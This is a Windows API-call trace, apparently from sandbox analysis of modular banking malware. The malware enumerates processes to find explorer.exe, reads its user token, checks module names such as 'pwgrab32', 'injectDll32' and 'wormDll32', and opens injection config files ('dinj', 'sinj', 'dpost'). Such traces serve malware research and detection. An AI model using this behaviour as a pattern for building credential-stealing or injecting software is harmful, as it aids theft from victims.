	[0247.191] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0247.191] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.192] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0247.192] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.194] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0247.194] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.195] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0247.195] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.196] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0247.196] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.198] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0247.198] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.199] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0247.199] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.201] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0247.201] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0247.202] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0247.202] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.203] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0247.203] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0247.205] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0247.205] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0247.206] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0247.206] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.207] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0247.207] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0247.209] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0247.209] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0247.210] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0247.210] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0247.212] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0247.212] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0247.261] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0247.261] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0247.262] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
	[0247.262] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0247.263] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0247.263] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0247.264] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0247.264] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0247.265] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0247.265] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0247.266] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0247.266] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0247.267] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0247.267] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0247.268] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0247.268] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0247.268] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0247.268] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0247.269] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0247.269] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0247.270] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0247.270] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0247.271] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0247.271] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0247.272] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0247.272] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0247.273] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0247.273] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0247.274] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0247.274] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0247.275] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0247.275] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0247.276] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0247.276] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0247.277] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0247.277] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0247.278] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0247.278] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0247.279] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0247.279] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0247.280] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0247.280] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.281] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0247.281] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.282] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0247.282] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.283] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0247.283] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.283] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0247.283] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0247.284] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0247.284] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.285] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0247.285] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.286] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0247.286] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0247.287] lstrcmpW (lpString1="explorer.exe", lpString2="cmd.exe") returned 1
	[0247.287] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0247.288] lstrcmpW (lpString1="explorer.exe", lpString2="conhost.exe") returned 1
	[0247.288] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0247.289] lstrcmpW (lpString1="explorer.exe", lpString2="net.exe") returned -1
	[0247.289] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.290] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0247.290] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0247.291] CloseHandle (hObject=0x678) returned 1
	[0247.291] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e14e0
	[0247.291] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e17b0
	[0247.291] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2807150
	[0247.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x678
	[0247.291] OpenProcessToken (in: ProcessHandle=0x678, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x600) returned 1
	[0247.291] GetTokenInformation (in: TokenHandle=0x600, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0247.291] GetLastError () returned 0x7a
	[0247.291] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x27dadb8
	[0247.291] GetTokenInformation (in: TokenHandle=0x600, TokenInformationClass=0x1, TokenInformation=0x27dadb8, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x27dadb8, ReturnLength=0x128c98) returned 1
	[0247.291] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x27dadc0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
	[0247.292] CloseHandle (hObject=0x600) returned 1
	[0247.292] CloseHandle (hObject=0x678) returned 1
	[0247.292] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27beff0
	[0247.292] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e14e0) returned 1
	[0247.292] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfdd8
	[0247.292] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e14e0
	[0247.292] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2807258
	[0247.292] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0247.292] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0247.292] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0247.293] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0247.293] lstrcmpiW (lpString1="shareDll32", lpString2="pwgrab32") returned 1
	[0247.293] lstrcmpiW (lpString1="wormDll32", lpString2="pwgrab32") returned 1
	[0247.293] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0247.293] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2807258) returned 1
	[0247.293] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e14e0) returned 1
	[0247.293] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e17b0) returned 1
	[0247.293] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225fc8
	[0247.293] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0247.293] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0247.293] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0247.293] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0247.293] GetExitCodeThread (in: hThread=0x5e4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0247.293] GetExitCodeThread (in: hThread=0x6d4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0247.293] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225fc8) returned 1
	[0247.293] Sleep (dwMilliseconds=0x4e20) 
	[0247.339] Sleep (dwMilliseconds=0x4e20) 
	[0247.381] Sleep (dwMilliseconds=0x4e20) 
	[0247.387] Sleep (dwMilliseconds=0x4e20) 
	[0247.402] Sleep (dwMilliseconds=0x4e20) 
	[0247.417] Sleep (dwMilliseconds=0x4e20) 
	[0247.434] Sleep (dwMilliseconds=0x4e20) 
	[0247.449] Sleep (dwMilliseconds=0x4e20) 
	[0247.465] Sleep (dwMilliseconds=0x4e20) 
	[0247.528] Sleep (dwMilliseconds=0x4e20) 
	[0247.569] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x7b42cc20, dwHighDateTime=0x1d50a6a)) 
	[0247.569] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0247.569] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x674
	[0247.569] GetFileTime (in: hFile=0x674, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a)) returned 1
	[0247.569] CloseHandle (hObject=0x674) returned 1
	[0247.569] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7b42cc20, dwHighDateTime=0x1d50a6a)) 
	[0247.570] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x674
	[0247.570] GetFileTime (in: hFile=0x674, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0247.570] CloseHandle (hObject=0x674) returned 1
	[0247.570] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7b42cc20, dwHighDateTime=0x1d50a6a)) 
	[0247.570] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x674
